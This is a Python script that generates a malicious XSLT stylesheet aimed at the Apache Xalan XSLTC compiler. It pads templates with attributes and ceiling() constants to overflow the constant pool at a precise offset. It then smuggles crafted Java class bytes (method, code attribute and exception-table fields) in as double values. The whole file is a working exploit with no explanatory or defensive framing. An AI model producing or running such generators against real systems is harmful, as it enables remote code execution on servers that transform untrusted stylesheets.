import string 
from xml.sax.saxutils import escape
import sys
import struct
import decimal

ctx = decimal.Context()

ctx.prec = 20

def float_to_str(f):
    # Avoid using scientific notation
    d1 = ctx.create_decimal(repr(f))
    return format(d1, 'f')

def to_double(b):
    return float_to_str(struct.unpack('>d', struct.pack('>Q', b))[0])

def unique_strings():
    for a in string.ascii_letters:
        for b in string.ascii_letters:
            for c in string.ascii_letters:
                yield a+b+c

def unique_number():
  if not hasattr(unique_number, "counter"):
     unique_number.counter = 133700 
  unique_number.counter += 1
  return unique_number.counter

def generate_template(count, strings, first):

    offset = 0x69a

    num = 0 
    def n(strings):
        nonlocal num
        num+=2
        return next(strings)

    ret = f"""<xsl:template name='{n(strings)}' match="/{n(strings)}">"""
    num+=1 # template 

    ret += f"""<ceil """


    while num < 158+0x100-4:
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    ret += "<xsl:value-of select='ceiling(1337)'/>" # 

    ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
    num += 1

    ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
    num += 1

    #ret += f"""<{n(strings)} {n(strings)}='&lt;init&gt;' {n(strings)}='' """
    #if first:
    #    num+=4

    ret += f"<{n(strings)} "

    while num < 0x610:
        ret += f"{n(strings)}='{n(strings)}' "

    while num < offset -4:
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"
    while num < offset-1:
        print(f"offset doesn't work {num} {offset}", file=sys.stderr)
        sys.exit()
    

    def w(n):
        nonlocal num
        if first:
            num+=2
        return f"""
        <xsl:value-of select='ceiling({to_double(n)})'/>
        """
    ret+= w(0x0006000000000002)
    ret+= w(0x0100410042000101)
    ret+= w(0x0000000500000101)
    ret+= w(0x0001006E00420003) # Method Indexes and attributes count
    ret+= w(0x0000000004AABBCC)
    ret+= w(0x00470000008E00FF) # Code Attribute Index, Length and max_stack
    ret+= w(0x0000000082B14444) # LSB of max_locals, code_length, code
    ret+= w(0x0000000000444445)
    ret+= w(0x0000000000444446)
    ret+= w(0x0000000000444447)
    ret+= w(0x0000000000444448)
    ret+= w(0x0000000000444449)
    ret+= w(0x000000000044444A)
    ret+= w(0x000000000044444B)
    ret+= w(0x000000000044444C)
    ret+= w(0x000000000044444D)
    ret+= w(0x000000000044444E)
    ret+= w(0x000000000044444F)
    ret+= w(0x0000000000444450)
    ret+= w(0x0000000000444451)
    ret+= w(0x0000000000444452)
    # Exception Table
    ret+= w(0x0000000000410000)
    ret+= w(0x0B00000000444454)

    # stop at org.apache.xalan.xsltc.trax.TemplatesImpl:317

    # fill up our third method argument (length == 0x60B) with garbage

    ret += f"""<{n(strings)} """

    for _ in range(0, 85):
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    ret+= w(0x000106000007d863)

    ret += f"""<{n(strings)} """

    while num < count-4:
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    while num < count:
        ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
        num+=1

    print(f"{num} {count}", file=sys.stderr)
    ret+="""</xsl:template>"""
    return ret+"\n"


total_globals = 153 + 4

c = 16793.0 
#c = 4000.0

strings_iter = unique_strings()
xml = """
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">\n"""
xml+=generate_template(c,strings_iter, True)
total_globals+=c
xml+=generate_template(c,strings_iter, False)
total_globals+=c
xml+=generate_template(c,strings_iter, False)
total_globals+=c
xml+=generate_template(c,strings_iter, False)
total_globals+=c
xml+="""</xsl:stylesheet>"""


print(c, file=sys.stderr)
print(hex(int(total_globals)), file=sys.stderr)
print(total_globals, file=sys.stderr)

print(xml)



